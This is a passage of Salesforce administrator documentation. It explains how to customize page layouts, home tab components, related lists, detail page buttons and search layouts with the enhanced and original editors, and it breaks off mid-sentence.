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• To review the page layout, click Preview As. From the preview in Enterprise, Unlimited, and Developer Editions, select
a profile to see how the pages will look for users with different profiles. Note that most related lists’ columns preview
without data.

• To quickly locate any item in the palette, use the Quick Find box. The Quick Find box is especially useful for page layouts
that have large numbers of items available in the palette.

• To choose which related records display in the console's mini view, click Mini Console View. (Available in Professional,
Enterprise, Unlimited, and Developer Edition organizations only.)

Note:  You can’t choose Mini Console View for the Close Case layout or the Log a Case page and View Cases
page layouts on the Self-Service Portal. You cannot choose Mini Console View for opportunity team page layouts.

• To define the mini page layouts of the records that appear in the mini view of the console, click Mini Page Layout. The
mini page layout also defines the layout of the hover details and event overlays. (Available in Professional, Enterprise,
Unlimited, and Developer Edition organizations only.)

Note:  You cannot define mini page layouts for the Close Case layout or the Log a Case page and View Cases
page layouts on the Self-Service Portal. You cannot define mini page layouts for opportunity team page layouts.

• To choose which fields will be displayed on the record detail page and the order in which they will appear, click Edit
Multi-Line Layout.

• To save your changes and continue editing the page layout, click Quick Save.

• To save your changes when you are done customizing the page layout, click Save. If you navigate away from your page
layout before clicking Save, you will lose your changes.

• To create a copy of your page layout, click Save and select Save As. When you copy a page layout, any actions assigned to
it are also copied to the new layout.

Tip:  Here are a few tips to keep your page layouts well-organized and easy to use:

• Remove unnecessary fields.

• Keep the number of required fields to a minimum.

• Group similar fields with sections.

• Think about the right TAB key order for each section.

• Check your layouts in Read and Edit modes.

• Add help text to custom fields. Use it to explain to users what kind of data you’re looking for in the field.

• In Enterprise and Unlimited Editions, use record types to provide unique layouts for different records.

• Optimize related lists—adjust their overall order, the sorting of the records, and display of relevant columns and
buttons.

See Also:
Notes on Using the Enhanced Page Layout Editor
Customizing Related Lists
Managing Page Layouts
Accessing the Page Layout Editor for Standard Objects
Accessing the Page Layout Editor for Custom Objects
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Enhanced Page Layout Editor User Interface Elements

Available in: All Editions

User Permissions Needed

“Customize Application”To customize page layouts:

“View Setup”To view page layouts:

The following list describes the enhanced page layout editor user interface elements and how you can use them in your page
layout.

Tip:  Create the appropriate buttons, custom links, fields, custom s-controls, and Visualforce pages before editing
your page layout.

Actions

To add actions to the Chatter publisher on the page layout, select the Actions category on the palette and drag one or
more actions from the palette to the Chatter Feed section.

To remove an action, drag it back to the palette.

Tip:  If you delete an action, it is automatically removed from all layouts it’s assigned to.

Blank Spaces

You can add and move blank spaces to any section on the page layout. Use blank spaces to visually align and distinguish
elements on the page.

To add a blank space, drag the Blank Space user interface element from the palette to the desired location on the page
layout. The Blank Space user interface element is the first option in the palette when you select the Fields, Custom
Links, Custom S-Controls, or Visualforce Pages category on the palette.

Note:  If you use the original page layout editor to view a page layout that was created in the enhanced page
layout editor, the original page layout editor will show any blank spaces you added. You cannot move or add
blank spaces in the original page layout editor, but you can remove them by dragging them to the box on the
right.

Buttons

The top of the page layout has a place for standard buttons and another for custom buttons. You can control which
standard and custom buttons are displayed and the order in which the custom buttons appear; however, you cannot
rearrange the order in which the standard buttons appear.

To add a custom or standard button to the page layout, select the Buttons category on the palette and drag one or more
buttons from the palette to the buttons section on the page layout. Standard buttons must go in the standard buttons
area, and custom buttons must go in the custom buttons area.
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To remove a standard or custom button from the page layout, drag the button to the palette.

Custom Links

To add custom links to the page layout, select the Custom Links category on the palette and drag one or more custom
links from the palette to the Custom Links section on the page layout.

To remove a custom link from the page layout, drag the custom link to the palette.

Fields

To add fields to the page layout, select the Fields category on the palette and drag one or more fields from the palette
to any section on the page layout, except for sections reserved for custom buttons or links and related lists.

A field might display one or more of the following icons:

•  The field must have a value to save the record but is not required on the page layout itself.

•  The field must be included on the page layout because either an administrator configured the field as universally
required or Salesforce automatically requires the field. Although you cannot remove such fields, you can move them
to different locations.

•  The field is a controlling field.

•  The field is a dependent field.

•  The field is read only.

To set which fields are required and read only, select one or more fields and click the wrench icon ( ) on any of the
selected fields.

• The field properties of some standard fields cannot be changed. Custom fields can only be changed if they are not
universally required fields.

• Fields marked as read only are always editable by administrators and users with the “Edit Read Only Fields” permission.

• If you make a picklist field read only, all new records will contain the default value for that picklist.

• Auto-number fields are always read only.

• If you mark the opportunity Probability field as read only, the Probability value will still be updated
automatically when a user changes the Stage value of an opportunity.

When working with fields, note the following:

• In Personal, Contact Manager, Group, and Professional Editions, page layouts control which fields users can access
in related lists, list views, reports, Connect Offline, email and mail merge templates, custom links, and when
synchronizing data. In Enterprise, Unlimited, and Developer Editions, this access is controlled by field-level security.
Field-level security settings override any field properties you set on the page layout if the field-level security is more
restrictive than the page layout setting.

• In the organization-wide import wizards for accounts, contacts, and leads, administrators have access to import into
any field, even if a field is hidden or read only in their page layout or field-level security settings. Individual users can
import only into the fields that are accessible to them via their page layout or field-level security settings.

Related Lists

To add related lists to the page layout, select the Related Lists category on the palette and drag one or more related lists
from the palette to the desired location on the page layout. A page layout can have up to 100 related lists.

You can place related lists at the bottom of the page layout. To move a related list on the page layout, drag the handle
located above the related list.
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To customize a related list, double-click the related list handle or click the wrench icon ( ) inside the handle. Use the
related list properties to:

• Specify which fields display as columns on the related list, the order in which they appear, and the sort order of the
records in the related list. In Professional, Enterprise, and Unlimited Editions, you can also opt to apply the column
information to other page layouts for the same type of object.

• Specify which standard and custom buttons appear on the related list.

When working with related lists on page layouts, note the following:

• Some related lists are not customizable because they link to data rather than store it. Salesforce denotes related lists
that are not customizable on the page layout.

• You cannot add related lists to the page layouts for the User object.

• You can also enable related list hover links for your organization so that record detail pages include links for each
related list at the top of the page. Users can hover the mouse over a related list hover link to display the corresponding
related list in an interactive overlay that allows users to quickly view and manage the related list items. Users can also
click a related list hover link to jump down to the content of the related list without having to scroll down the page.

• In Professional, Enterprise, Unlimited, and Developer Edition, individual users can customize which related lists
display for their personal use. Administrators can overwrite these user customizations and apply the related list
configuration in the page layout to all users, even if they already customized their display. To overwrite users' related
list customizations, click Yes on the Overwrite Users' Personal Related List Customizations popup window, which
appears when saving a page layout if you moved or added a related list.

Custom S-Controls

To add s-controls to the page layout, select the Custom S-Controls category on the palette and drag one or more
s-controls from the palette to any section on the page layout, except for sections reserved for custom buttons or links
and related lists. A page layout can have up to 20 s-controls.

To change the properties of an s-control, double-click the s-control or click its wrench icon ( ) and set the following
attributes:

• Width sets the horizontal size in pixels or a percent.

• Height sets the vertical size in pixels.

• Show scrollbars determines whether the iFrame in which the s-control displays contains scrollbars when necessary.

• Show label determines whether the page layout includes the Label of the custom s-control. Remove the label to
display the s-control in a wider area.

Sections

You can add and move sections anywhere above the related lists on the page layout. The sections you add can contain
fields, s-controls, and blank spaces. In addition, each page layout has a default section that can only contain custom links
and blank spaces. You can change the location of the custom link section, but you cannot remove it from the page.

To add a section, drag the Section user interface element from the palette to the desired location on the page layout.
The Section user interface element is the second option in the palette when you select the Fields or Custom S-Controls
category on the palette.

To change the attributes of a section, double-click the section or select its associated wrench icon ( ). You can:

• Enter a name for the section. Note that names of some standard page sections cannot be changed.
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• Specify whether the section should have one or two columns.

• Specify the order in which users will be able to tab through the items in that section.

• Specify whether the section heading should be shown on the detail and edit pages.

Tags

If tags are enabled in your organization, click Layout Properties and use the checkboxes to indicate whether personal
and public tags should be included in the header section of the page layout. Users cannot tag a record if neither personal
nor public tags are included in the header section. Also, the positioning of personal and public tags in the header cannot
be modified.

Visualforce Pages

To add Visualforce pages to the page layout, select the Visualforce Pages category on the palette and drag one or more
Visualforce pages from the palette to any section on the page layout, except for sections reserved for custom links and
related lists. A page layout can have up to 20 Visualforce pages.

You can add a Visualforce page to a page layout only if the standard controller on the Visualforce page is set to the object
for which you are creating the page layout. If you do not have any Visualforce pages with a standard controller set to
that object, the Visualforce Pages category does not appear in the palette.

See Also:
Notes on Using the Enhanced Page Layout Editor
Customizing Page Layouts with the Enhanced Page Layout Editor

Notes on Using the Enhanced Page Layout Editor

Available in: All Editions

User Permissions Needed

“Customize Application”To customize page layouts:

“View Setup”To view page layouts:

When using the enhanced page layout editor, note the following:

• You can't rename a page layout if you're using Salesforce.com Professional Edition.

• Some elements can only be moved to certain locations on the page layout.

• Elements that are already on the page layout still appear on the palette but are inactive. When you click an inactive element
on the palette, Salesforce highlights the element on the page layout.

• When you select a category of elements on the palette, such as Related Lists or Custom Links, Salesforce jumps to the
part of the page layout where you can add those elements.

• The following table describes which browsers support the enhanced page layout editor:
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NotesBrowser

Users with the “View Setup and Configuration” permission
can view but not edit page layouts using Firefox version 2.

Mozilla® Firefox®, most recent stable version

Internet Explorer 6 does not perform well with advanced
Web interfaces such as the enhanced page layout editor, and
is no longer supported as of Summer ‘12.

Microsoft® Internet Explorer® versions 7, 8, 9, and 10

Important:  Using Internet Explorer with the
Internet Explorer Developer Toolbar impacts the
performance of the enhanced page layout editor.
Disable the toolbar before using the enhanced page
layout editor.

1. In Internet Explorer, navigate to Tools >
Internet Options... > Programs.

2. Click Manage Add-ons....
3. Select IE Developer Toolbar and IE

Developer Toolbar BHO, and choose the
Disable option.

4. Close all Internet Explorer windows and restart
the browser.

• If the original page layout editor is enabled, users can click on the page layout name to access the detail page of the page
layout. The enhanced page layout editor does not have detail pages, as all the detail page functionality is always available
on the enhanced editor. Salesforce displays a read-only version of the enhanced page layout editor to users with the “View
Setup” permission.

Note:  The read-only view of the page layout does not display field types and lengths in hover details.

• Some standard objects have checkboxes that are specific to page layouts for that object. The following table lists those
standard object checkboxes. To configure how Salesforce displays the checkboxes, click Layout Properties when customizing
the page layout. Use the Select by default checkbox associated with a checkbox if you want Salesforce to automatically
select the option when a user accesses the edit page.

CheckboxesObject

Evaluate this account against territory
rules on save checkbox — Displays the Evaluate

Account

this account against territory rules on save
checkbox on account edit pages.

Territory assignment rules run automatically when the
Select by default checkbox is selected.

If both Show on edit page and Select by default
are selected, users can uncheck Evaluate this account
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against territory rules on save checkbox on the
account edit page, and territory assignment rules will not be
run.

Case ◊ Case assignment checkbox — Displays the
Assign using active assignment rules
checkbox on case edit pages.

◊ Email notification checkbox — Displays the
Send notification email to contact checkbox
on case edit pages.

Case Close ◊ Solution information section — Displays the
solution information section on the case close edit pages.

◊ Notify Contact — Displays the Notify Contact
checkbox on case close edit pages.

Lead assignment checkbox — Displays the Assign
using active assignment rule checkbox appears on
the lead edit page.

Lead

Evaluate this account against territory
rules on save checkbox — Displays the Evaluate

Person Account

this account against territory rules on save
checkbox on person account edit pages.

Territory assignment rules run automatically when the
Select by default checkbox is selected.

If both Show on edit page and Select by default
are selected, users can uncheck Evaluate this account
against territory rules on save checkbox on the
account edit page, and territory assignment rules will not be
run.

Email notification checkbox — Displays the Send
Notification Email checkbox appears on the task edit
page.

Task

Note:  A user’s personal preference for defaulting
the state of the checkbox takes precedence over the
organization-wide setting..

• The Custom Links, Custom S-Controls, and Visualforce Pages categories only appear in the palette if you have defined
those types of elements for the object for which you are defining a page layout.

• Page layouts for the user object only include custom fields, custom links, s-controls, and Visualforce pages. Tagging, related
lists, custom buttons, and standard field customizations are not included on page layouts for the user object. Also, field-level
security is only available for custom fields on the user object.
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• If a dependent lookup is above its controlling field on a page layout, make its lookup filter optional or redesign the page
layout. Seeing a required dependent lookup above its controlling field on a page layout may confuse users who typically
start from the top of the page when entering data.

• You can define mini page layouts for the user object; however, you cannot add standard fields or related lists. Also, a
customized mini page layout won’t display in the Console tab.

• When editing a person account page layout:

◊ If you add Shipping Address next to Billing Address in the Address Information section, a link will display
on the person account edit page that allows you to copy the billing address to the shipping address. Also, an equivalent
link appears if you add Other Address to the Address Information section.

◊ Contact fields and related lists are available on person account page layouts. However, contact custom links and custom
buttons are not available.

• Salesforce recommends creating no more than 200 page layouts. While there is no limit, organizations may have difficulty
managing their page layouts if they exceed 200.

See Also:
Enhanced Page Layout Editor User Interface Elements
Customizing Page Layouts with the Enhanced Page Layout Editor

Customizing Page Layouts with the Original Page Layout Editor

Available in: All Editions

User Permissions Needed

“Customize Application”To customize page layouts:

The original page layout editor allows you to customize page layouts for detail and edit pages in Salesforce, the Self-Service
Portal, and the Salesforce Customer Portal.

Note: Salesforce.com recommends using the enhanced page layout editor instead of the original page layout editor.

1. Access the page layout editor.

• Accessing the Page Layout Editor for Standard Objects
• Accessing the Page Layout Editor for Custom Objects

2. If tags are enabled, specify whether personal and public tags should be included in the header section of the page layout.
Users can tag a record only if personal or public tags are included here.

• To add personal or public tags, select Header Items from the View drop-down list and then drag the Personal Tags or
Public Tags items to the header section. You can’t change the order in which personal and public tags appear when
both are in the header section at the same time.
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• To remove tags, drag the Personal Tags and Public Tags items from the header section to the area under the View
drop-down list.

3. To customize buttons, double-click Detail Page Buttons in the Button section.

• To hide any standard button, deselect the checkbox next to the button name.
• To add or remove a custom button, select the button in the Available Buttons list, and click Add or Remove.
• To sort custom buttons, select them and click Up or Down.
• To undo your customizations and restore default settings, click Revert to Defaults.
• To close the popup, click OK.

4. To arrange fields, custom s-controls, Visualforce pages, custom links, and related lists on the layout, select one or more
items from the box on the right and drag them to the desired location. You can add up to 20 s-controls, 20 Visualforce
pages, and 100 related lists on a page layout. There are no limits on fields and custom links.

• To select multiple items individually, use CTRL+click.
• To select multiple items as a group, use SHIFT+click..

Note:

• You can add a Visualforce page to a page layout only if the standard controller on the Visualforce page is set
to the object for which you are creating the page layout. If you do not have any Visualforce pages with a
standard controller set to that object, the Visualforce Pages category does not appear in the palette.

• Items that are not in the page layout are displayed in the scrolling box on the right-hand side.
• Use the legend to determine what fields are required, dependent, controlling, or have other attributes that may

affect your page layout decisions.

5. To set which fields are required and read only, select one or more fields and click Edit Properties.

• The field properties of some standard fields cannot be changed. Custom fields can be changed only if they are not
universally required fields.

• Fields marked as read only are always editable by administrators and users with the “Edit Read Only Fields” permission.
• If you make a picklist field read only, all new records will contain the default value for that picklist.
• Auto-number fields are always read only.
• If you mark the opportunity Probability field as read only, the Probability value will still be updated automatically

when a user changes the Stage value of an opportunity.
• In Enterprise, Unlimited, and Developer Editions, field-level security settings override any field properties you set here

if the field-level security is more restrictive than the page layout setting.

6. To change the properties of an s-control or Visualforce page, double click it and set the following attributes.

• Width sets the horizontal size in pixels or a percent.
• Height sets the vertical size in pixels.
• Show scrollbars determines whether the iFrame in which the s-control displays contains scrollbars when necessary.
• Show label determines whether the page layout includes the Label of the custom s-control. Remove the label to

display the custom s-control in a wider area.

7. To organize the page using sections, click Edit next to an existing page section, or click Create New Section to create a
new page section.

• Enter a name for the section. Note that names of some standard page sections cannot be changed.
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• Set whether the section should have one or two columns.
• Set the order in which users can tab through the items in that section.
• Set whether the section name should be shown on the detail and edit pages.

8. To customize related lists on the page layout, double-click a related list in the Related List section.

• To add or remove fields, select one or more fields and use the arrows to add or remove them to the related list columns
on the page layout and to define the order in which the related list columns display. You can include up to 10 fields
per related list.

• To select multiple fields individually, use CTRL+click.
• To select multiple fields as a group, use SHIFT+click.
• To sort the items in the related list, select a field from the Sort By drop-down list. Items are displayed in ascending

order unless you select Descending. The default sort order varies per record. The Sort By drop-down is not available
for activities and opportunity products.

• If necessary, select additional page layouts to which your related list customizations will apply.
• To customize which standard buttons display in the related list, select or deselect the checkbox next to the button name.
• To customize which custom buttons display in the related list, select the button and click Add or Remove. To sort

custom buttons, select them and click Up or Down.

Note:  To create a custom button for the related list, see Defining Custom Buttons and Links. The custom
button must be defined for the object contained in the related list, instead of the parent object, and the button
Type must be List Button. For example, to display a custom button on the Contacts related list of an account,
define the custom button for contacts, not accounts.

Some related lists are not customizable because they link to data rather than store it. You can move your cursor over any
related list section to see if it is customizable. Also, lookup fields are not available for display on their corresponding lookup
related list. For example, the case lookup field on an account page layout is not available when editing the cases related
list.

Note: You can enable related list hover links so that record detail pages include links for each related list at the
top of the page. Users can hover the mouse over a related list hover link to display the corresponding related list
in an interactive overlay that allows users to quickly view and manage the related list items. Users can also click a
related list hover link to jump to the content of the related list without scrolling down the page.

9. To apply the related lists in the page layout to all users, even if they have already customized their display, select Overwrite
users’ personal related list customization.

10. To review the page layout, click Preview. From the preview in Enterprise, Unlimited, and Developer Editions, select a
profile to see how the pages will look for users with different profiles. Note that most related lists’ columns preview without
data.

11. Click Save to finish. Alternatively, click Quick Save to save and continue editing the page layout.

In Professional, Enterprise, Unlimited, and Developer Editions:.

• To choose which related records display in the Console tab's mini view, click Mini Console View.

• To define the mini page layouts of the records that appear in the Console tab's mini view, click Mini Page Layout.

Note:  You cannot define mini console views or mini page layouts for the Close Case Layout or the Log a Case Page
and View Cases Page layouts on the Self-Service Portal.

2825

Customizing Page LayoutsCustomizing Your Organization



In Enterprise, Unlimited, and Developer Editions:

• You can assign page layouts for different profile and record type combinations.

• You can set field-level security to restrict field access further.

See Also:
Notes on Using the Original Page Layout Editor
Customizing Related Lists
Managing Page Layouts
Accessing the Page Layout Editor for Standard Objects
Accessing the Page Layout Editor for Custom Objects

Notes on Using the Original Page Layout Editor

Available in: All Editions

• When customizing page layouts for tasks, you can select the following checkboxes.

◊ Show Task Email Notification checkbox displays the Send Notification Email checkbox when users
create or edit a task.

◊ Select Task Email Notification checkbox by default selects the Send Notification Email
checkbox by default when users create or edit a task. Note that a user's personal preference for defaulting the state of
the checkbox takes precedence over the organization-wide setting.

• When customizing page layouts for cases, you can select the following checkboxes.

◊ Show Case Assignment checkbox displays the Assign using active assignment rules checkbox when
users create or edit a case.

◊ Select Case Assignment checkbox by default selects the Assign using active assignment rules
checkbox by default when users create or edit a case. Note that a user's personal preference for defaulting the state of
the checkbox takes precedence over the organization-wide setting.

◊ Show Case Email Notification checkbox displays the Send Notification Email checkbox when users
create or edit a case.

◊ Select Case Email Notification checkbox by default selects the Send Notification Email
checkbox by default when users create or edit a case.

• Page layouts for the user object only include custom fields, custom links, s-controls, and Visualforce pages. Tagging, related
lists, custom buttons, and standard field customizations are not included on page layouts for the user object. Also, field-level
security is available only for custom fields on the user object.

• You can define mini page layouts for the user object; however, you cannot add standard fields or related lists. Also, a
customized mini page layout won’t display in the Console tab.

• In the organization-wide import wizards for accounts, contacts, and leads, administrators have access to import into any
field, even if a field is hidden or read only in their page layout or field-level security settings. Individual users can import
only into the fields that are accessible to them via their page layout or field-level security settings.

• In Personal, Contact Manager, Group, and Professional Editions, page layouts control which fields users can access in
related lists, list views, reports, Connect Offline, email and mail merge templates, custom links, and when synchronizing
data. In Enterprise, Unlimited, and Developer Editions, this access is controlled by field-level security.
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• In Professional, Enterprise, Unlimited, and Developer Edition, individual users can customize which tabs and related lists
display for their personal use.

• When editing a person account page layout, if you add Shipping Address next to Billing Address in the Address
Information section, a link will display on the person account edit page that allows you to copy the billing address to the
shipping address. Also, an equivalent link appears if you add Other Address to the Address Information section.

• Some items can only be moved to certain sections on the page layout. For example, you can drag a custom s-control to any
field section on the page layout but not a related list section or button section.

• Create the appropriate buttons before editing your page layout. For example, create an account custom button for the detail
page and a contact custom list button before putting them both on an account page layout.

• If you use the original page layout editor to view a page layout that was created in the new page layout editor, the original
page layout editor will show any blank spaces you added. You cannot move or add blank spaces in the original page layout
editor, but you can remove them by dragging them to the box on the right.

See Also:
Customizing Page Layouts with the Original Page Layout Editor

Customizing Home Tab Page Layouts

Available in: All Editions

User Permissions Needed

“Customize Application”To view home page layouts:

“Customize Application”To create or change home page layouts:

You can customize the Home tab to include components such as sidebar links, a company logo, or a dashboard snapshot. A
dashboard snapshot is a clipping of the top row of a dashboard’s components. Just like other tabs, you can also assign different
home page layouts to different users based on profile.

Alternatively, a custom home page layout can contain only the components that show up in the sidebar. You can determine
if custom sidebar components appear only on the Home tab or on all Salesforce pages.

To start customizing your home page layouts, see:

• Defining Home Tab Components on page 2828

• Designing Home Tab Page Layouts on page 2829

• Assigning Home Tab Page Layouts to Profiles on page 2830

2827

Customizing Page LayoutsCustomizing Your Organization



Defining Home Tab Components

Available in: All Editions

User Permissions Needed

“Customize Application”To create or change home page layouts:

Home page layouts contain standard components, such as Recent Items and Messages & Alerts, and any custom components
you create. You can create custom components such as a logo, and you can edit some standard components.

Editing Components

1. From Setup, click Customize > Home > Home Page Components.
2. Click Edit next to the component you want to edit. If there is no Edit link next to a component, it is read only.
3. Make any changes.

• When editing the standard Messages & Alerts component, enter the text you want to display to users. If entering
HTML code for your message, make sure it is self-contained, well-formed HTML.

• When editing the standard Custom Links home page component, enter the link text to display to users in the Bookmark
field. In the URL field, enter the complete website address, such as http://www.yahoo.com. To link to a Salesforce
page, such as a frequently-viewed report, enter only the part of the URL after salesforce.com, for example,
/00Ox0000000esq4. These links always open within the main Salesforce window, not in a popup window.

Note:  The standard Custom Links home page component is a quick way to add links to the sidebar, but it
does not support merge fields, functions (such as the URLFOR function), executing JavaScript, or customizable
window opening properties. If you need this additional functionality:

a. From Setup, click Customize > Home > Custom Links, and create your home page custom links on that
page.

b. From Setup, click Customize > Home > Home Page Components, and create a custom home page
component of type Links on that page that includes the custom links created in the first step. Note that
creating a custom home page component for your links does not change the visual styling for your end
users.

4. Click Save.

Next, add the component to a home page layout; see Designing Home Tab Page Layouts on page 2829.

Creating Custom Components

If you are creating custom link components, define your Home tab custom links first. See Understanding Custom Buttons
and Links on page 3493. If you are creating an image component, upload your image to the Documents tab first.

1. From Setup, click Customize > Home > Home Page Components.
2. Click New.
3. Enter a name for the component. For custom links, this name displays as the section heading in the sidebar on the Home

tab.
4. Choose the type of component.
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5. Click Next.

• For links, select the appropriate custom links and click Add.
• For images, click Insert an image, choose the document folder, and select the image file. Note that the image file must

be in a public folder and the Externally Available checkbox must be selected on the document's properties so
that users can view the image.

• For HTML area, choose where to display the component, in either the wide or narrow column, and enter your text,
image, or links in the box below.

Note:  Components in the narrow column display in the sidebar. They do not display in the sidebar on other
pages within Salesforce unless you specify that in your user interface settings or by assigning the “Show Custom
Sidebar On All Pages” permission.

6. Click Save.

Next, add the component to a home page layout; see Designing Home Tab Page Layouts on page 2829.

Tip:  Keep your image size smaller than 20 KB for optimum performance. If your image is too large to fit in the insert
window, use an image editor to resize the image. Save your image in gif or jpeg format to reduce file size.

See Also:
Assigning Home Tab Page Layouts to Profiles

Designing Home Tab Page Layouts

Available in: All Editions

User Permissions Needed

“Customize Application”To view home page layouts:

“Customize Application”To create or change home page layouts:

After creating the components you want displayed on the Home tab, begin designing your home page layouts.

1. From Setup, click Customize > Home > Home Page Layouts.
2. Click New. Alternately, select a layout you want to copy and click Clone.
3. Enter a name for the new layout.
4. Click Save.
5. Select the components you want displayed on the new page layout. Consider the following:

• The components you select for the narrow column display in the sidebar. They do not display in the sidebar on other
pages within Salesforce unless you specify that in your user interface settings.If you only want certain users to view
sidebar components on all pages, grant those user the “Show Custom Sidebar On All Pages” permission.

• Select Article Search to add the Find Articles component to a home page layout. This component is only available
for Salesforce Knowledge users.
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• Select Customer Portal Welcome to add the Customer Portal component to a home page layout. If the My Profile
site Visualforce page has been enabled, this component contains a personalized welcome message and a link to the
portal user's profile. The My Profile page enables users logged into either your Force.com site, or your Customer Portal
from Force.com sites, to update their own contact information. When they make changes to this page, the corresponding
portal user and contact records are updated.

• When you select Dashboard Snapshot as a component to show on a home page layout, Salesforce displays the last
dashboard the user accessed. Users can view a dashboard snapshot on their Home tab if they have access to at least one
dashboard.

Tip: When designing home page layouts for your Customer Portal, we recommend adding the following
components: Search, Solution Search, Recent Items, Customer Portal Welcome, and a custom HTML Area
component that includes your corporate branding in the wide column.

6. Click Next.
7. Arrange the selected components in the desired columns. Select a component and use the arrow keys to move it.
8. Optionally, click Preview to display the home page layout.
9. Click Save & Assign to save the page layout and assign it to a profile. Initially, all users, including Customer Portal users,

are assigned to the Home Page Default layout.

See Also:
Customizing Home Tab Page Layouts
Defining Home Tab Components

Assigning Home Tab Page Layouts to Profiles

Available in: All Editions

User Permissions Needed

“Customize Application”To assign home page layouts:

Your home page layouts are only visible to users after you assign them to a user profile.

1. From Setup, click Customize > Home > Home Page Layouts.
2. Click Page Layout Assignment.
3. Click Edit Assignment.
4. Choose the appropriate page layout for each profile.
5. Click Save.

Tip:  Users can customize the dashboard settings on their Home tab in their personal settings.
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Editing Multi-Line Layouts for Opportunity Products

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To edit multi-line layouts for opportunity products:

You can customize the columns that display when you click Edit All in the Products related list of an opportunity detail page.

1. From Setup, click Customize > Opportunities > Opportunity Products > Page Layouts.
2. Next to the name of an opportunity product page layout, click Edit.
3. Click Edit Multi-Line Layout.
4. Move fields between Available Fields and Selected Fields.

• To customize which fields display in the layout, select one or more fields in Available Fields and click Add or Remove.
• To sort fields in the layout, select one or more fields in Selected Fields and click Up or Down.
• To select multiple fields individually, use CTRL+click.
• To select multiple fields as a group, use SHIFT+click.

5. Click Save to apply your changes.

Building Page Layouts for Custom Objects

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To define page layouts for custom objects:

Page layouts define which fields users can view and edit when entering data for a custom object record. You can use the default
page layout that is created automatically when you create a custom object. You can also build your own page layout with related
lists and custom links. If you do not use any page layout with your custom object, you can still interact with it by using the
Force.com API to manage custom data or build a custom user interface.

To define a page layout for a custom object:

1. From Setup, click Create > Objects.
2. Select one of the custom objects in the list.
3. In the Page Layouts related list, click Edit next to one of the page layouts to modify it, or click New to create a new page

layout.
4. When creating a new page layout, enter a name for it, and select an existing page layout to clone, if desired.
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5. Edit the page layout just as you would any other page layout.
6. Click Save.

See Also:
Customizing Page Layouts

Customizing Related Lists

Available in: All Editions except Database.com

User Permissions Needed

“Customize Application”To customize related lists:

To customize the buttons, columns displayed, column order, and record sort order of related lists on record detail pages in
Salesforce and the Salesforce Customer Portal:

1. Access the page layout editor.
2. Double-click a related list on the layout to edit it. If you are using the enhanced page layout editor, you can also click the

wrench icon ( ).

Note:  You can’t customize the History related list because it doesn’t store data. The History related list links to
data stored elsewhere.

3. To customize the fields that display in the related list:

• Select one or more fields and use the arrows to add or remove the fields to the related list columns on the page layout,
and to define the order in which the related list columns display. You can include up to 10 fields per related list.

Note:  The first field of a related list can't be moved. They are considered as unique identifiers for the record.

• Use CTRL+click to select multiple fields individually.
• Use SHIFT+click to select multiple fields as a group.
• Select a field from the Sort By drop-down list to sort the items in the related list, which will be displayed in ascending

order unless you select Descending. The default sort order varies per record. The Sort By drop-down is not available
for activities and opportunity products.

• If necessary, select additional page layouts to apply your related list customizations to. Only layouts that include this
related list appear in the list. Layouts that include related lists with the same customizations as the current layout had
when you opened are selected by default.

Lookup fields are not available for display on their corresponding lookup related list. For example, the case lookup field
on an account page layout is not available when editing the cases related list.
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4. To customize which standard buttons display in the related list, select or deselect the checkbox next to any standard button
name.

Note:  To view the buttons in the enhanced page layout editor, click the plus sign (+) in the Buttons section.

5. To customize which custom buttons display in the related list:

• To add or remove a custom button, select the button and click Add or Remove.
• Sort custom buttons by selecting them and clicking Up or Down.

The custom button must be defined for the object contained in the related list, instead of the parent object, and the button
Type must be List Button. For example, to display a custom button on the Contacts related list of an account, define the
custom button for contacts, not accounts.

6. If necessary, click Revert to Defaults to undo any customizations and use the default Salesforce settings in the related list.
7. Click OK to store your customizations. Changes are not saved until you click Save on the page layout.
8. Select the Overwrite users’ personal related list customization to apply the related lists in the page

layout to all users, even if they have already customized their display.
9. Click Preview to review the page layout. From the preview in Enterprise, Unlimited, and Developer Editions, select a

profile to see how the pages will look for users with different profiles.
10. Click Save.

Note: You can enable related list hover links so that record detail pages include links for each related list at the top
of the page. Users can hover the mouse over a related list hover link to display the corresponding related list in an
interactive overlay that allows users to quickly view and manage the related list items. Users can also click a related
list hover link to jump to the content of the related list without scrolling down the page.

See Also:
Overview of Page Layouts and Field-Level Security

Customizing Detail Page Buttons

Available in: All Editions

User Permissions Needed

“Customize Application”To customize detail page buttons:

When customizing page layouts, you can control which standard and custom buttons are displayed and the order in which
the custom buttons are shown. To customize the buttons on record detail pages:

1. From Setup, click Customize, select the appropriate activity or tab link, and choose the Page Layouts link.

For custom objects, from Setup, click Create > Objects, and select the desired custom object.
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2. Click Edit next to the page layout you want to customize.
3. Do one of the following:

• In the original page layout editor, double-click the Detail Page Buttons item in the Button Section.

◊ To hide any standard button, deselect the checkbox next to the button name.
◊ To add or remove a custom button, select the button in the Available Buttons list, and click Add or Remove.
◊ Sort custom buttons by selecting them and clicking Up or Down.
◊ To undo your customizations and restore default settings, click Revert to Defaults.
◊ Click OK to close the popup when you are done.

• In the enhanced page layout editor, select the Buttons category on the palette and drag one or more buttons from the
palette to the buttons section on the page layout. Standard buttons must go in the standard buttons area, and custom
buttons must go in the custom buttons area. To remove a standard or custom button from the page layout, drag the
button to the palette.

4. Click Save on the page layout.
5. Click Save.

See Also:
Overriding Standard Buttons and Tab Home Pages
Defining Custom Buttons and Links

Customizing Search Layouts

Available in: All Editions

User Permissions Needed

“Customize Application”To change search layouts:

Customize which fields display for users in search results, search filter fields, lookup dialogs, the recent records lists on tab
home pages, and in lookup phone dialogs for Salesforce CRM Call Center. You can specify a different set of fields to show
in each search layout. The settings apply to all users in your organization and Salesforce Customer Portal.

Additionally, customize which buttons display in custom list views and search results. You can hide a standard list view button
or display a custom button. Standard buttons are not available on search result layouts. To display a custom button, create the
custom button, giving it the List Button Display Type.

1. From Setup, click Customize, select the appropriate activity or tab link, and click Search Layouts.
2. Click Edit next to the layout you want to customize. You can specify a different set of items to display for search results,

lookup dialogs, recent records lists on tab home pages, lookup phone dialogs, list views, and search filter fields.
3. For list view and search results layouts, select the standard or custom buttons you want to display. To hide a standard

button on the list view, deselect it. Standard buttons are not available on search result layouts.
4. Move fields between Available Fields and Selected Fields.
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• To customize which fields display in the layout, select one or more fields and click Add or Remove.
• To sort fields in the layout, select one or more fields in Selected Fields and click Up or Down.
• To select multiple fields individually, use CTRL+click.
• To select multiple fields as a group, use SHIFT+click.

• To customize which items display in the layout, select the item and click Add or Remove.
• To sort items in the layout, select the item and click Up or Down.

Note:  When editing a search results layout for an object, you can select the Override the search result
